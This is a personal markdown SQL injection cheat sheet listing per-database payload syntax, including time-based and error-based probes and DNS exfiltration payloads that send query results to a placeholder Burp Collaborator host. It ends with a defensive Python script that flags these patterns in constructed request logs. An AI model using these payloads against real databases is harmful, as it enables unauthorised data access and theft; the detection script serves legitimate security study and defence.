sql_injection
- **path**: personal/hacking/sql_injection.md
- **fileName**: sql_injection
- **Created on**: 2025-06-24 13:01:06
# SQL Injection Cheat Sheet
This SQL injection cheat sheet contains examples of useful syntax for performing various SQL injection attacks.
## String Concatenation
Concatenate multiple strings into a single string.
- Oracle: `'foo'||'bar'`
- Microsoft: `'foo'+'bar'`
- PostgreSQL: `'foo'||'bar'`
- MySQL: `'foo' 'bar'` [Note the space], `CONCAT('foo','bar')`
## Substring
Extract part of a string from a specified offset (1-based). Each of the following returns `'ba'`.
- Oracle: `SUBSTR('foobar', 4, 2)`
- Microsoft: `SUBSTRING('foobar', 4, 2)`
- PostgreSQL: `SUBSTRING('foobar', 4, 2)`
- MySQL: `SUBSTRING('foobar', 4, 2)`
## Comments
Truncate a query by commenting out the remaining portion.
- Oracle: `--comment`
- Microsoft: `--comment`, `/*comment*/`
- PostgreSQL: `--comment`, `/*comment*/`
- MySQL: `#comment`, `-- comment` [Note the space after `--`], `/*comment*/`
## Database Version
Query the database type and version.
- Oracle: `SELECT banner FROM v$version`, `SELECT version FROM v$instance`
- Microsoft: `SELECT @@version`
- PostgreSQL: `SELECT version()`
- MySQL: `SELECT @@version`
## Database Contents
List the tables in the database and the columns of a given table.
- Oracle: `SELECT * FROM all_tables`, `SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'`
- Microsoft: `SELECT * FROM information_schema.tables`, `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'`
- PostgreSQL: `SELECT * FROM information_schema.tables`, `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'`
- MySQL: `SELECT * FROM information_schema.tables`, `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'`
## Conditional Errors
Trigger a database error when a single boolean condition is true.
- Oracle: `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual`
- Microsoft: `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END`
- PostgreSQL: `1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)`
- MySQL: `SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')`
## Batched Queries
Execute several queries in succession; the results of the second and later queries are not returned to the application.
- Oracle: Not supported
- Microsoft: `QUERY-1-HERE; QUERY-2-HERE`, `QUERY-1-HERE QUERY-2-HERE`
- PostgreSQL: `QUERY-1-HERE; QUERY-2-HERE`
- MySQL: `QUERY-1-HERE; QUERY-2-HERE` [Limited support]
## Time Delays
Cause an unconditional time delay of 10 seconds.
- Oracle: `dbms_pipe.receive_message(('a'),10)`
- Microsoft: `WAITFOR DELAY '0:0:10'`
- PostgreSQL: `SELECT pg_sleep(10)`
- MySQL: `SELECT SLEEP(10)`
## Conditional Time Delays
Trigger a time delay when a boolean condition is true.
- Oracle: `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual`
- Microsoft: `IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'`
- PostgreSQL: `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END`
- MySQL: `SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')`
## DNS Lookup
Cause the database to perform a DNS lookup to an external domain (requires Burp Collaborator to observe the lookup).
- Oracle: `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual`
- Microsoft: `exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'`
- PostgreSQL: `copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'`
- MySQL: `LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')` [Windows only]
## DNS Data Exfiltration
Exfiltrate the result of a query via a DNS lookup, by embedding the result in the hostname that is looked up.
- Oracle: `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual`
- Microsoft: `declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')`
- PostgreSQL: `create OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN'''; execute c; END; $$ language plpgsql security definer; SELECT f();`
- MySQL: `SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'` [Windows only]
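Read from the defender's side, the syntax in the sections above is exactly what to hunt for in web-server request logs. The following is an added example, not part of the original note: a Python triage script that URL-decodes each request line and tags it with the technique family (version probe, schema enumeration, conditional error, batched queries, time delay, out-of-band DNS, comment truncation) whose syntax it contains. The log lines and the host name are constructed, and the script assumes a single layer of URL encoding.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique family on the sheet, built only from the syntax listed there.
SIGNATURES = {
    "version_probe": re.compile(r"@@version|v\$version|v\$instance|\bversion\(\)", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)|\ball_tab(les|_columns)\b", re.I),
    "conditional_error": re.compile(r"case\s+when.*?(1/0|1/\(select\s+0\))", re.I | re.S),
    "batched_queries": re.compile(r";\s*(select|exec|insert|update|delete|drop|declare|copy|create)\b", re.I),
    "time_delay": re.compile(r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|dbms_pipe\.receive_message", re.I),
    "oob_dns": re.compile(r"xp_dirtree|load_file\s*\(|into\s+outfile|to\s+program|extractvalue\s*\(", re.I),
    "comment_truncation": re.compile(r"['\)]\s*(--|#|/\*)"),  # comment right after a closed literal/paren
}


def classify(raw_request: str) -> list[str]:
    """Return the technique families found in one raw request line, sorted by name."""
    decoded = unquote_plus(raw_request)  # assumes a single layer of URL encoding (constructed setup)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(lines):
    """Yield (line_number, families) for every log line that matches at least one family."""
    for number, line in enumerate(lines, start=1):
        hits = classify(line)
        if hits:
            yield number, hits


# Constructed sample access-log lines; not real traffic. PLACEHOLDER-HOST stands in for an OOB domain.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jun/2025:13:01:06] "GET /item?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Jun/2025:13:01:07] "GET /item?id=42%27%3B+SELECT+pg_sleep%2810%29-- HTTP/1.1" 200 0',
    '10.0.0.9 - - [24/Jun/2025:13:01:08] "GET /item?id=42+UNION+SELECT+%40%40version HTTP/1.1" 500 0',
    '10.0.0.9 - - [24/Jun/2025:13:01:09] "GET /item?id=42%27+AND+1%3D(SELECT+CASE+WHEN+(1%3D1)'
    '+THEN+1%2F(SELECT+0)+ELSE+NULL+END)-- HTTP/1.1" 500 0',
    '10.0.0.9 - - [24/Jun/2025:13:01:10] "GET /item?id=42%3B+exec+master..xp_dirtree+%27//PLACEHOLDER-HOST/a%27 HTTP/1.1" 200 0',
    '10.0.0.5 - - [24/Jun/2025:13:01:11] "GET /search?q=sleep+tracker HTTP/1.1" 200 900',  # benign: no match
]

if __name__ == "__main__":
    for number, families in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(families)}")
```

Signatures like these are a triage aid for hunting and alert enrichment; the only real fix for the application is parameterised queries, which this script does not replace.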